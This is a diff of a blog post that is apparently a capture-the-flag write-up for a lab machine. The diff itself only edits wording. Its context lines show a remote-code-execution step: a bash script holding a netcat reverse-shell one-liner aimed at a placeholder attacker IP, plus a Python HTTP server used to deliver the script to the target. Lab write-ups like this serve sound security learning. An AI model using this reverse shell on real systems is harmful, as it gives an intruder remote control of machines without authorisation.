tsumarios/blog/_posts/2022-09-11-thm-convert-my-video.md

 ## Remote Code Execution (RCE)

 We can now try to execute a reverse shell.
-There are several ways to do that, in this case we can opt for a simple netcat reverse shell.
+There are several ways to do that, in this case, we can opt for a simple netcat reverse shell.
 Let's write it down in a file:

 ```sh
 #!/bin/bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_IP> 4444 >/tmp/f
 ```

 Now we have to upload the file to the remote machine.
-In order to do such thing, we can simply run a Python server and download the file from the remote machine:
+To do such a thing, we can simply run a Python server and download the file from the remote machine:

 ```sh
 attacker@machine:~$ python3 -m http.server 4343